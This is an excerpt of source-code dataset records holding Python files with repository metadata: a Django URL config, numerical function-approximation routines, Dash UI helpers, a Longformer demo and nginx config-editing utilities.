sys.exit(workflow.run(main)) | 31.810811 | 98 | 0.534551 | 801 | 7,062 | 4.548065 | 0.235955 | 0.03294 | 0.01647 | 0.02196 | 0.217678 | 0.152896 | 0.106231 | 0.093604 | 0.093604 | 0.079056 | 0 | 0.007877 | 0.352875 | 7,062 | 222 | 99 | 31.810811 | 0.789278 | 0.059048 | 0 | 0.272727 | 0 | 0 | 0.098462 | 0.004071 | 0 | 0 | 0 | 0 | 0 | 1 | 0.048485 | false | 0.012121 | 0.084848 | 0 | 0.212121 | 0.036364 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 |
e73aed3b29e68e999fa8e3ace630cc2cc0db89e5 | 734 | py | Python | bookshelf/accounts/urls.py | Danielvalev/bookshelf | eda857b275de49623c57e2288f86f401b87406c9 | [
"MIT"
] | null | null | null | bookshelf/accounts/urls.py | Danielvalev/bookshelf | eda857b275de49623c57e2288f86f401b87406c9 | [
"MIT"
] | null | null | null | bookshelf/accounts/urls.py | Danielvalev/bookshelf | eda857b275de49623c57e2288f86f401b87406c9 | [
"MIT"
] | null | null | null | from django.urls import path
from accounts.views import user_profile, LogoutView, LoginView, RegisterView, user_profile_edit
urlpatterns = [
# path('login/', login_user, name='login user'),
path('login/', LoginView.as_view(), name='login user'), # CBV
# path('logout/', logout_user, name='logout user'),
path('logout/', LogoutView.as_view(), name='logout user'), # CBV
# path('register/', register_user, name='register user'),
path('register/', RegisterView.as_view(), name='register user'), # CBV
# path('profile/', user_profile, name='current user profile'),
path('profile/<int:pk>', user_profile, name='user profile'),
path('edit/<int:pk>', user_profile_edit, name='user profile edit'),
]
| 43.176471 | 95 | 0.678474 | 94 | 734 | 5.159574 | 0.255319 | 0.181443 | 0.092784 | 0.065979 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0.144414 | 734 | 16 | 96 | 45.875 | 0.772293 | 0.30654 | 0 | 0 | 0 | 0 | 0.227545 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | false | 0 | 0.222222 | 0 | 0.222222 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 |
e73ccdac55d151051f197eec351b7129cd6e61de | 13,790 | py | Python | doc/.src/book/src/approx1D.py | hplgit/fem-book | c23099715dc3cb72e7f4d37625e6f9614ee5fc4e | [
"MIT"
] | 86 | 2015-12-17T12:57:11.000Z | 2022-03-26T01:53:47.000Z | doc/.src/book/src/approx1D.py | hplgit/fem-book | c23099715dc3cb72e7f4d37625e6f9614ee5fc4e | [
"MIT"
] | 9 | 2017-04-16T21:57:29.000Z | 2021-04-17T08:09:30.000Z | doc/.src/book/src/approx1D.py | hplgit/fem-book | c23099715dc3cb72e7f4d37625e6f9614ee5fc4e | [
"MIT"
] | 43 | 2016-03-11T19:33:14.000Z | 2022-03-05T00:21:57.000Z | """
Approximation of functions by linear combination of basis functions in
function spaces and the least squares method or the collocation method
for determining the coefficients.
"""
from __future__ import print_function
import sympy as sym
import numpy as np
import mpmath
import matplotlib.pyplot as plt
#import scitools.std as plt
def least_squares_non_verbose(f, psi, Omega, symbolic=True):  # 'symbolic' is accepted for API parity but unused here
"""
Given a function f(x) on an interval Omega (2-list)
return the best approximation to f(x) in the space V
spanned by the functions in the list psi.
"""
N = len(psi) - 1
A = sym.zeros(N+1, N+1)
b = sym.zeros(N+1, 1)
x = sym.Symbol('x')
for i in range(N+1):
for j in range(i, N+1):
integrand = psi[i]*psi[j]
integrand = sym.lambdify([x], integrand, 'mpmath')
I = mpmath.quad(integrand, [Omega[0], Omega[1]])
A[i,j] = A[j,i] = I
integrand = psi[i]*f
integrand = sym.lambdify([x], integrand, 'mpmath')
I = mpmath.quad(integrand, [Omega[0], Omega[1]])
b[i,0] = I
c = mpmath.lu_solve(A, b) # numerical solve
c = [c[i,0] for i in range(c.rows)]
u = sum(c[i]*psi[i] for i in range(len(psi)))
return u, c
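# Usage sketch (editor's addition; a tiny symbolic fit):
#   x = sym.Symbol('x')
#   u, c = least_squares_non_verbose(sym.sin(x), [x, x**3], [0, 1])
#   # u is c[0]*x + c[1]*x**3, the L2-best approximation of sin(x) on [0, 1]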
def least_squares(f, psi, Omega, symbolic=True):
"""
Given a function f(x) on an interval Omega (2-list)
return the best approximation to f(x) in the space V
spanned by the functions in the list psi.
"""
N = len(psi) - 1
A = sym.zeros(N+1, N+1)
b = sym.zeros(N+1, 1)
x = sym.Symbol('x')
print('...evaluating matrix...', end=' ')
for i in range(N+1):
for j in range(i, N+1):
print('(%d,%d)' % (i, j))
integrand = psi[i]*psi[j]
if symbolic:
I = sym.integrate(integrand, (x, Omega[0], Omega[1]))
if not symbolic or isinstance(I, sym.Integral):
# Could not integrate symbolically, use numerical int.
print('numerical integration of', integrand)
integrand = sym.lambdify([x], integrand, 'mpmath')
I = mpmath.quad(integrand, [Omega[0], Omega[1]])
A[i,j] = A[j,i] = I
integrand = psi[i]*f
if symbolic:
I = sym.integrate(integrand, (x, Omega[0], Omega[1]))
if not symbolic or isinstance(I, sym.Integral):
# Could not integrate symbolically, use numerical int.
print('numerical integration of', integrand)
integrand = sym.lambdify([x], integrand, 'mpmath')
I = mpmath.quad(integrand, [Omega[0], Omega[1]])
b[i,0] = I
print()
print('A:\n', A, '\nb:\n', b)
if symbolic:
c = A.LUsolve(b) # symbolic solve
# c is a sympy Matrix object, numbers are in c[i,0]
c = [sym.simplify(c[i,0]) for i in range(c.shape[0])]
else:
c = mpmath.lu_solve(A, b) # numerical solve
c = [c[i,0] for i in range(c.rows)]
print('coeff:', c)
u = sum(c[i]*psi[i] for i in range(len(psi)))
print('approximation:', u)
return u, c
def numerical_linsys_solve(A, b, floating_point_calc='sympy'):
"""
Given a linear system Au=b as sympy arrays, solve the
system using different floating-point software.
floating_point_calc may be 'sympy', 'numpy.float64',
'numpy.float32'.
This function is used to investigate ill-conditioning
of linear systems arising from approximation methods.
"""
if floating_point_calc == 'sympy':
        #mpmath.mp.dps = 10 # does not affect the computations here
A = mpmath.fp.matrix(A)
b = mpmath.fp.matrix(b)
print('A:\n', A, '\nb:\n', b)
c = mpmath.fp.lu_solve(A, b)
#c = mpmath.lu_solve(A, b) # more accurate
print('mpmath.fp.lu_solve:', c)
elif floating_point_calc.startswith('numpy'):
import numpy as np
# Double precision (float64) by default
A = np.array(A.evalf())
b = np.array(b.evalf())
if floating_point_calc == 'numpy.float32':
# Single precision
A = A.astype(np.float32)
b = b.astype(np.float32)
c = np.linalg.solve(A, b)
print('numpy.linalg.solve, %s:' % floating_point_calc, c)
def least_squares_orth(f, psi, Omega, symbolic=True):
"""
    Same as least_squares, but for an orthogonal
    basis, which avoids invoking standard
    Gaussian elimination.
"""
N = len(psi) - 1
A = [0]*(N+1) # plain list to hold symbolic expressions
b = [0]*(N+1)
x = sym.Symbol('x')
print('...evaluating matrix...', end=' ')
for i in range(N+1):
print('(%d,%d)' % (i, i))
# Assume orthogonal psi can be be integrated symbolically
# and that this is a successful/possible integration
A[i] = sym.integrate(psi[i]**2, (x, Omega[0], Omega[1]))
# Fallback on numerical integration if f*psi is too difficult
# to integrate
integrand = psi[i]*f
if symbolic:
I = sym.integrate(integrand, (x, Omega[0], Omega[1]))
if not symbolic or isinstance(I, sym.Integral):
print('numerical integration of', integrand)
integrand = sym.lambdify([x], integrand, 'mpmath')
I = mpmath.quad(integrand, [Omega[0], Omega[1]])
b[i] = I
print('A:\n', A, '\nb:\n', b)
c = [b[i]/A[i] for i in range(len(b))]
print('coeff:', c)
    u = sum(c[i]*psi[i] for i in range(len(psi)))
print('approximation:', u)
return u, c
def trapezoidal(values, dx):
"""
Integrate a function whose values on a mesh with spacing dx
are in the array values.
"""
#return dx*np.sum(values)
return dx*(np.sum(values) - 0.5*values[0] - 0.5*values[-1])
def least_squares_numerical(f, psi, N, x,
integration_method='scipy',
orthogonal_basis=False):
"""
Given a function f(x) (Python function), a basis specified by the
Python function psi(x, i), and a mesh x (array), return the best
    approximation to f(x) in the space V spanned by the functions
in the list psi. The best approximation is represented as an array
of values corresponding to x. All calculations are performed
numerically. integration_method can be `scipy` or `trapezoidal`
(the latter uses x as mesh for evaluating f).
"""
import scipy.integrate
A = np.zeros((N+1, N+1))
b = np.zeros(N+1)
if not callable(f) or not callable(psi):
raise TypeError('f and psi must be callable Python functions')
Omega = [x[0], x[-1]]
dx = x[1] - x[0] # assume uniform partition
print('...evaluating matrix...', end=' ')
for i in range(N+1):
j_limit = i+1 if orthogonal_basis else N+1
for j in range(i, j_limit):
print('(%d,%d)' % (i, j))
if integration_method == 'scipy':
A_ij = scipy.integrate.quad(
lambda x: psi(x,i)*psi(x,j),
Omega[0], Omega[1], epsabs=1E-9, epsrel=1E-9)[0]
elif integration_method == 'sympy':
A_ij = mpmath.quad(
lambda x: psi(x,i)*psi(x,j),
[Omega[0], Omega[1]])
else:
values = psi(x,i)*psi(x,j)
A_ij = trapezoidal(values, dx)
A[i,j] = A[j,i] = A_ij
if integration_method == 'scipy':
b_i = scipy.integrate.quad(
lambda x: f(x)*psi(x,i), Omega[0], Omega[1],
epsabs=1E-9, epsrel=1E-9)[0]
elif integration_method == 'sympy':
b_i = mpmath.quad(
lambda x: f(x)*psi(x,i), [Omega[0], Omega[1]])
else:
values = f(x)*psi(x,i)
b_i = trapezoidal(values, dx)
b[i] = b_i
c = b/np.diag(A) if orthogonal_basis else np.linalg.solve(A, b)
u = sum(c[i]*psi(x, i) for i in range(N+1))
return u, c
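# Usage sketch (editor's addition; an orthogonal sine basis on [0, 2*pi]):
#   x_mesh = np.linspace(0, 2*np.pi, 501)
#   psi = lambda x, i: np.sin((i + 1)*x)
#   u, c = least_squares_numerical(np.sin, psi, N=3, x=x_mesh, orthogonal_basis=True)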
def interpolation(f, psi, points):
"""
Given a function f(x), return the approximation to
f(x) in the space V, spanned by psi, that interpolates
f at the given points. Must have len(points) = len(psi)
"""
N = len(psi) - 1
A = sym.zeros(N+1, N+1)
b = sym.zeros(N+1, 1)
# Wrap psi and f in Python functions rather than expressions
# so that we can evaluate psi at points[i] (alternative to subs?)
psi_sym = psi # save symbolic expression
x = sym.Symbol('x')
psi = [sym.lambdify([x], psi[i], 'mpmath') for i in range(N+1)]
f = sym.lambdify([x], f, 'mpmath')
print('...evaluating matrix...')
for i in range(N+1):
for j in range(N+1):
print('(%d,%d)' % (i, j))
A[i,j] = psi[j](points[i])
b[i,0] = f(points[i])
print()
print('A:\n', A, '\nb:\n', b)
c = A.LUsolve(b)
# c is a sympy Matrix object, turn to list
c = [sym.simplify(c[i,0]) for i in range(c.shape[0])]
print('coeff:', c)
# u = sym.simplify(sum(c[i,0]*psi_sym[i] for i in range(N+1)))
u = sym.simplify(sum(c[i]*psi_sym[i] for i in range(N+1)))
print('approximation:', u)
return u, c
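# Usage sketch (editor's addition; len(points) must equal len(psi)):
#   x = sym.Symbol('x')
#   u, c = interpolation(10*(x - 1)**2 - 1, [1, x], points=[1, 2])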
collocation = interpolation # synonym in this module
def regression(f, psi, points):
"""
Given a function f(x), return the approximation to
f(x) in the space V, spanned by psi, using a regression
method based on points. Must have len(points) > len(psi).
"""
N = len(psi) - 1
m = len(points) - 1
# Use numpy arrays and numerical computing
B = np.zeros((N+1, N+1))
d = np.zeros(N+1)
# Wrap psi and f in Python functions rather than expressions
# so that we can evaluate psi at points[i]
x = sym.Symbol('x')
psi_sym = psi # save symbolic expression for u
psi = [sym.lambdify([x], psi[i]) for i in range(N+1)]
f = sym.lambdify([x], f)
print('...evaluating matrix...')
for i in range(N+1):
for j in range(N+1):
B[i,j] = 0
for k in range(m+1):
B[i,j] += psi[i](points[k])*psi[j](points[k])
d[i] = 0
for k in range(m+1):
d[i] += psi[i](points[k])*f(points[k])
print('B:\n', B, '\nd:\n', d)
c = np.linalg.solve(B, d)
print('coeff:', c)
u = sum(c[i]*psi_sym[i] for i in range(N+1))
print('approximation:', sym.simplify(u))
return u, c
def regression_with_noise(f, psi, points):
"""
Given a data points in the array f, return the approximation
to the data in the space V, spanned by psi, using a regression
method based on f and the corresponding coordinates in points.
Must have len(points) = len(f) > len(psi).
"""
N = len(psi) - 1
m = len(points) - 1
# Use numpy arrays and numerical computing
B = np.zeros((N+1, N+1))
d = np.zeros(N+1)
# Wrap psi and f in Python functions rather than expressions
# so that we can evaluate psi at points[i]
x = sym.Symbol('x')
psi_sym = psi # save symbolic expression for u
psi = [sym.lambdify([x], psi[i]) for i in range(N+1)]
if not isinstance(f, np.ndarray):
raise TypeError('f is %s, must be ndarray' % type(f))
print('...evaluating matrix...')
for i in range(N+1):
for j in range(N+1):
B[i,j] = 0
for k in range(m+1):
B[i,j] += psi[i](points[k])*psi[j](points[k])
d[i] = 0
for k in range(m+1):
d[i] += psi[i](points[k])*f[k]
print('B:\n', B, '\nd:\n', d)
c = np.linalg.solve(B, d)
print('coeff:', c)
u = sum(c[i]*psi_sym[i] for i in range(N+1))
print('approximation:', sym.simplify(u))
return u, c
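# Usage sketch (editor's addition; synthetic noisy data):
#   x = sym.Symbol('x')
#   points = np.linspace(0, 1, 21)
#   f_data = 2*points + 0.05*np.random.randn(len(points))
#   u, c = regression_with_noise(f_data, [1, x], points)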
def comparison_plot(
f, u, Omega, filename='tmp',
plot_title='', ymin=None, ymax=None,
u_legend='approximation',
points=None, point_values=None, points_legend=None,
legend_loc='upper right',
show=True):
"""Compare f(x) and u(x) for x in Omega in a plot."""
x = sym.Symbol('x')
print('f:', f)
print('u:', u)
f = sym.lambdify([x], f, modules="numpy")
u = sym.lambdify([x], u, modules="numpy")
if len(Omega) != 2:
raise ValueError('Omega=%s must be an interval (2-list)' % str(Omega))
# When doing symbolics, Omega can easily contain symbolic expressions,
# assume .evalf() will work in that case to obtain numerical
# expressions, which then must be converted to float before calling
# linspace below
if not isinstance(Omega[0], (int,float)):
Omega[0] = float(Omega[0].evalf())
if not isinstance(Omega[1], (int,float)):
Omega[1] = float(Omega[1].evalf())
resolution = 601 # no of points in plot (high resolution)
xcoor = np.linspace(Omega[0], Omega[1], resolution)
# Vectorized functions expressions does not work with
# lambdify'ed functions without the modules="numpy"
exact = f(xcoor)
approx = u(xcoor)
plt.figure()
plt.plot(xcoor, approx, '-')
plt.plot(xcoor, exact, '--')
legends = [u_legend, 'exact']
if points is not None:
if point_values is None:
# Use f
plt.plot(points, f(points), 'ko')
else:
# Use supplied points
plt.plot(points, point_values, 'ko')
if points_legend is not None:
legends.append(points_legend)
else:
legends.append('points')
plt.legend(legends, loc=legend_loc)
plt.title(plot_title)
plt.xlabel('x')
if ymin is not None and ymax is not None:
plt.axis([xcoor[0], xcoor[-1], ymin, ymax])
plt.savefig(filename + '.pdf')
plt.savefig(filename + '.png')
if show:
plt.show()
if __name__ == '__main__':
print('Module file not meant for execution.')
| 36.005222 | 78 | 0.570631 | 2,136 | 13,790 | 3.645599 | 0.1353 | 0.01053 | 0.018492 | 0.033903 | 0.527931 | 0.498138 | 0.458713 | 0.453833 | 0.442789 | 0.435726 | 0 | 0.015483 | 0.283394 | 13,790 | 382 | 79 | 36.099476 | 0.772516 | 0.266715 | 0 | 0.557252 | 0 | 0 | 0.077495 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0.038168 | false | 0 | 0.026718 | 0 | 0.09542 | 0.141221 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 |
e7422355175454fcfb89f48ad2d00d9c5dd1fa0e | 2,532 | py | Python | dash_website/utils/controls.py | SamuelDiai/Dash-Website | e064e432f14a86de1b54cf31ab311997c5643129 | [
"MIT"
] | null | null | null | dash_website/utils/controls.py | SamuelDiai/Dash-Website | e064e432f14a86de1b54cf31ab311997c5643129 | [
"MIT"
] | null | null | null | dash_website/utils/controls.py | SamuelDiai/Dash-Website | e064e432f14a86de1b54cf31ab311997c5643129 | [
"MIT"
] | null | null | null | import dash_bootstrap_components as dbc
import dash_core_components as dcc
import dash_html_components as html
def get_options_from_list(list_):
list_label_value = []
for value in list_:
list_label_value.append({"value": value, "label": value})
return list_label_value
def get_options_from_dict(dict_):
list_label_value = []
for key_value, label in dict_.items():
list_label_value.append({"value": key_value, "label": label})
return list_label_value
def get_item_radio_items(id, items, legend, from_dict=True, value_idx=0):
if from_dict:
options = get_options_from_dict(items)
else:
options = get_options_from_list(items)
return dbc.FormGroup(
[
html.P(legend),
dcc.RadioItems(
id=id,
options=options,
value=options[value_idx]["value"],
labelStyle={"display": "inline-block", "margin": "5px"},
),
]
)
def get_drop_down(id, items, legend, from_dict=True, value=None, multi=False, clearable=False):
if from_dict:
options = get_options_from_dict(items)
else:
options = get_options_from_list(items)
if value is None:
value = options[0]["value"]
if multi and type(value) != list:
value = [value]
return dbc.FormGroup(
[
html.P(legend),
dcc.Dropdown(
id=id,
options=options,
value=value,
clearable=clearable,
multi=multi,
placeholder="Nothing is selected.",
),
]
)
def get_check_list(id, items, legend, from_dict=True, value=None):
if from_dict:
options = get_options_from_dict(items)
else:
options = get_options_from_list(items)
if value is None:
value = options[0]["value"]
return dbc.FormGroup(
[
html.P(legend),
dcc.Checklist(id=id, options=options, value=[value], labelStyle={"display": "inline-block"}),
]
)
def get_range_slider(id, min, max, legend):
return dbc.FormGroup(
[
html.P(legend),
dcc.RangeSlider(
id=id,
min=min,
max=max,
value=[min, max],
marks=dict(zip(range(min, max + 1, 5), [str(elem) for elem in range(min, max + 1, 5)])),
step=None,
),
html.Br(),
]
)
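# Usage sketch (editor's addition; ids and labels are hypothetical):
#   controls = [
#       get_item_radio_items("sex", {"all": "All", "male": "Male"}, "Select sex:"),
#       get_drop_down("organ", ["Heart", "Brain"], "Select organ:", from_dict=False),
#       get_range_slider("age", 20, 70, "Select age range:"),
#   ]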
| 25.836735 | 105 | 0.554502 | 296 | 2,532 | 4.523649 | 0.233108 | 0.059746 | 0.083645 | 0.0941 | 0.584765 | 0.465273 | 0.384615 | 0.314414 | 0.212099 | 0.212099 | 0 | 0.004759 | 0.336098 | 2,532 | 97 | 106 | 26.103093 | 0.791791 | 0 | 0 | 0.455696 | 0 | 0 | 0.040284 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0.075949 | false | 0 | 0.037975 | 0.012658 | 0.189873 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 |
e745fb5c2bd82701b4b6fe87fdf23d2d1913eabb | 2,333 | py | Python | hedwig/test.py | Cool-tong/covid | 389c490e60f7b854369e0600b6dfc071baceaa7e | [
"Apache-2.0"
] | 15 | 2020-06-25T21:44:41.000Z | 2022-01-14T23:41:50.000Z | hedwig/test.py | Cool-tong/covid | 389c490e60f7b854369e0600b6dfc071baceaa7e | [
"Apache-2.0"
] | 9 | 2021-03-31T19:48:34.000Z | 2022-03-12T00:34:28.000Z | hedwig/test.py | Cool-tong/covid | 389c490e60f7b854369e0600b6dfc071baceaa7e | [
"Apache-2.0"
] | 8 | 2020-09-16T10:29:14.000Z | 2022-01-16T17:53:41.000Z | # from transformers import ReformerModel, ReformerTokenizer
# import torch
#
# tokenizer = ReformerTokenizer.from_pretrained('google/reformer-crime-and-punishment')
# model = ReformerModel.from_pretrained('google/reformer-crime-and-punishment')
#
# input_ids = torch.tensor(tokenizer.encode("Hello, my dog is cute", add_special_tokens=True)).unsqueeze(0) # Batch size 1
# print(input_ids.shape)
# outputs = model(input_ids)
#
# pooled_output = torch.mean(outputs[0], dim=1)
#
# last_hidden_states = outputs[0]
import torch
from longformer.longformer import Longformer, LongformerConfig
from longformer.sliding_chunks import pad_to_window_size
from transformers import RobertaTokenizer
config = LongformerConfig.from_pretrained('longformer-base-4096/')
# choose the attention mode 'n2', 'tvm' or 'sliding_chunks'
# 'n2': for regular n2 attantion
# 'tvm': a custom CUDA kernel implementation of our sliding window attention
# 'sliding_chunks': a PyTorch implementation of our sliding window attention
config.attention_mode = 'sliding_chunks'
model = Longformer.from_pretrained('longformer-base-4096/', config=config)
tokenizer = RobertaTokenizer.from_pretrained('roberta-base')
tokenizer.model_max_length = model.config.max_position_embeddings
SAMPLE_TEXT = ' '.join(['Hello world! '] * 1000) # long input document
SAMPLE_TEXT = f'{tokenizer.cls_token}{SAMPLE_TEXT}{tokenizer.eos_token}'
input_ids = torch.tensor(tokenizer.encode(SAMPLE_TEXT)).unsqueeze(0) # batch of size 1
# TVM code doesn't work on CPU. Uncomment this if `config.attention_mode = 'tvm'`
# model = model.cuda(); input_ids = input_ids.cuda()
# Attention mask values -- 0: no attention, 1: local attention, 2: global attention
attention_mask = torch.ones(input_ids.shape, dtype=torch.long, device=input_ids.device) # initialize to local attention
attention_mask[:, [1, 4, 21,]] = 2 # Set global attention based on the task. For example,
# classification: the <s> token
# QA: question tokens
# padding seqlen to the nearest multiple of 512. Needed for the 'sliding_chunks' attention
input_ids, attention_mask = pad_to_window_size(
input_ids, attention_mask, config.attention_window[0], tokenizer.pad_token_id)
output = model(input_ids, attention_mask=attention_mask)[0]
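# Editor's note (assumed shapes): output is the final hidden-state sequence, so
# output.shape should be (1, padded_seq_len, hidden_size) for this batch of one;
# e.g. torch.mean(output, dim=1) yields a single document embedding.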
| 44.865385 | 123 | 0.753965 | 309 | 2,333 | 5.521036 | 0.398058 | 0.051583 | 0.029894 | 0.036928 | 0.179367 | 0.141852 | 0.053927 | 0 | 0 | 0 | 0 | 0.017509 | 0.143163 | 2,333 | 51 | 124 | 45.745098 | 0.835918 | 0.511787 | 0 | 0 | 0 | 0 | 0.123535 | 0.087466 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | false | 0 | 0.235294 | 0 | 0.235294 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 |
e746b6586494198935ce54917af266b0ab3f32e9 | 7,091 | py | Python | nginx_parse_emit/utils.py | offscale/nginx-parse-emit | 29b020f62fe1bc8377f2c30689f4bb4c5777ec69 | [
"Apache-2.0",
"MIT"
] | null | null | null | nginx_parse_emit/utils.py | offscale/nginx-parse-emit | 29b020f62fe1bc8377f2c30689f4bb4c5777ec69 | [
"Apache-2.0",
"MIT"
] | null | null | null | nginx_parse_emit/utils.py | offscale/nginx-parse-emit | 29b020f62fe1bc8377f2c30689f4bb4c5777ec69 | [
"Apache-2.0",
"MIT"
] | null | null | null | from operator import itemgetter
from platform import python_version_tuple
if python_version_tuple()[0] == "2":
from cStringIO import StringIO
else:
from functools import reduce
from io import StringIO
from copy import copy
from itertools import filterfalse
from os import remove, path
from string import Template
from tempfile import mkstemp
from fabric.contrib.files import exists
from fabric.operations import get, put
from nginxparser import loads, dumps, load
class DollarTemplate(Template):
delimiter = "$"
idpattern = r"[a-z][_a-z0-9]*"
def ensure_semicolon(s): # type: (str) -> str or None
if s is None:
return s
s = s.rstrip()
return s if not len(s) or s[-1] == ";" else "{};".format(s)
def _copy_or_marshal(block): # type: (str or list) -> list
return copy(block) if isinstance(block, list) else loads(block)
def merge_into(
server_name, parent_block, *child_blocks
): # type: (str, str or list, *list) -> list
parent_block = _copy_or_marshal(parent_block)
server_name_idx = -1
indicies = set()
break_ = False
for i, tier in enumerate(parent_block):
for j, statement in enumerate(tier):
for k, stm in enumerate(statement):
if statement[k][0] == "server_name" and statement[k][1] == server_name:
server_name_idx = i
indicies.add(k)
if break_:
break
elif statement[k][0] == "listen" and statement[k][1].startswith("443"):
break_ = True
if k in indicies:
break
server_name_idx += 1
if not len(indicies):
return parent_block
length = len(parent_block[-1])
if server_name_idx >= length:
server_name_idx = length - 1
parent_block[-1][server_name_idx] += list(
map(
lambda child_block: child_block[0]
if isinstance(child_block[0], list)
else loads(child_block)[0],
child_blocks,
)
)
parent_block[-1][server_name_idx] = list(
reversed(uniq(reversed(parent_block[-1][-1]), itemgetter(0)))
)
return parent_block
def merge_into_str(
server_name, parent_block, *child_blocks
):  # type: (str, str or list, *list) -> str
return dumps(merge_into(server_name, parent_block, *child_blocks))
def upsert_by_location(
server_name, location, parent_block, child_block
):  # type: (str, str, str or list, str or list) -> list
return merge_into(
server_name,
remove_by_location(_copy_or_marshal(parent_block), location),
child_block,
)
def remove_by_location(parent_block, location):  # type: (str or list, str) -> list
parent_block = _copy_or_marshal(parent_block)
parent_block = list(
map(
lambda block: list(
map(
lambda subblock: list(
filterfalse(
lambda subsubblock: len(subsubblock)
and len(subsubblock[0]) > 1
and subsubblock[0][1] == location,
subblock,
)
),
block,
)
),
parent_block,
)
)
return parent_block
def _prevent_slash(s): # type: (str) -> str
return s[1:] if s.startswith("/") else s
def apply_attributes(
block, attribute, append=False
): # type: (str or list, str or list, bool) -> list
block = _copy_or_marshal(block)
attribute = _copy_or_marshal(attribute)
if append:
block[-1][-1] += attribute
else:
changed = False
for bid, _block in enumerate(block[-1]):
for sid, subblock in enumerate(_block):
if isinstance(subblock[0], list):
block[-1][bid] = attribute + [block[-1][bid][sid]]
changed = True
break
if not changed:
block[-1][-1] += attribute
# TODO: Generalise these lines to a `remove_duplicates` or `remove_consecutive_duplicates` function
prev_key = None
subseq_removed = []
if not isinstance(block[0][1], list):
return block
block[0][1].reverse()
for subblock in block[0][1]:
if (
prev_key is not None
and prev_key == subblock[0]
and prev_key in ("server_name", "listen")
):
continue
subseq_removed.append(subblock)
prev_key = subblock[0]
subseq_removed.reverse()
block[0][1] = subseq_removed
return block
def upsert_upload(new_conf, name="default", use_sudo=True):
conf_name = "/etc/nginx/sites-enabled/{nginx_conf}".format(nginx_conf=name)
if not conf_name.endswith(".conf") and not exists(conf_name):
conf_name += ".conf"
# cStringIO.StringIO, StringIO.StringIO, TemporaryFile, SpooledTemporaryFile all failed :(
tempfile = mkstemp(name)[1]
get(remote_path=conf_name, local_path=tempfile, use_sudo=use_sudo)
with open(tempfile, "rt") as f:
conf = load(f)
new_conf = new_conf(conf)
remove(tempfile)
sio = StringIO()
sio.write(dumps(new_conf))
return put(sio, conf_name, use_sudo=use_sudo)
def get_parsed_remote_conf(
conf_name, suffix="nginx", use_sudo=True
): # type: (str, str, bool) -> [str]
if not conf_name.endswith(".conf") and not exists(conf_name):
conf_name += ".conf"
# cStringIO.StringIO, StringIO.StringIO, TemporaryFile, SpooledTemporaryFile all failed :(
tempfile = mkstemp(suffix)[1]
get(remote_path=conf_name, local_path=tempfile, use_sudo=use_sudo)
with open(tempfile, "rt") as f:
conf = load(f)
remove(tempfile)
return conf
def ensure_nginxparser_instance(conf_file): # type: (str) -> [[[str]]]
if isinstance(conf_file, list):
return conf_file
elif hasattr(conf_file, "read"):
return load(conf_file)
elif path.isfile(conf_file):
with open(conf_file, "rt") as f:
return load(f)
else:
return loads(conf_file)
def uniq(iterable, key=lambda x: x):
"""
Remove duplicates from an iterable. Preserves order.
:type iterable: Iterable[Ord => A]
:param iterable: an iterable of objects of any orderable type
:type key: Callable[A] -> (Ord => B)
:param key: optional argument; by default an item (A) is discarded
if another item (B), such that A == B, has already been encountered and taken.
If you provide a key, this condition changes to key(A) == key(B); the callable
must return orderable objects.
"""
# Enumerate the list to restore order lately; reduce the sorted list; restore order
def append_unique(acc, item):
return acc if key(acc[-1][1]) == key(item[1]) else acc.append(item) or acc
srt_enum = sorted(enumerate(iterable), key=lambda item: key(item[1]))
return [item[1] for item in sorted(reduce(append_unique, srt_enum, [srt_enum[0]]))]
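# Example (editor's addition): uniq([3, 1, 2, 1, 3]) returns [3, 1, 2] -- the first
# occurrence of each item is kept; with key=str.lower, uniq(['a', 'A', 'b']) -> ['a', 'b'].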
| 30.433476 | 103 | 0.608236 | 911 | 7,091 | 4.566411 | 0.218441 | 0.052885 | 0.015144 | 0.0125 | 0.202644 | 0.182692 | 0.174038 | 0.160096 | 0.110577 | 0.110577 | 0 | 0.010848 | 0.285009 | 7,091 | 232 | 104 | 30.564655 | 0.809665 | 0.158652 | 0 | 0.233918 | 0 | 0 | 0.023354 | 0.006262 | 0 | 0 | 0 | 0.00431 | 0 | 1 | 0.076023 | false | 0 | 0.081871 | 0.02924 | 0.28655 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 |
e74a548d5928286d5e89cff8efabd8323a997dc8 | 3,006 | py | Python | tests/skillsearch/clients.py | allenai/alexafsm | 0c2e8842ddbb4a34ac64a5139e7febee3b28889a | [
"Apache-2.0"
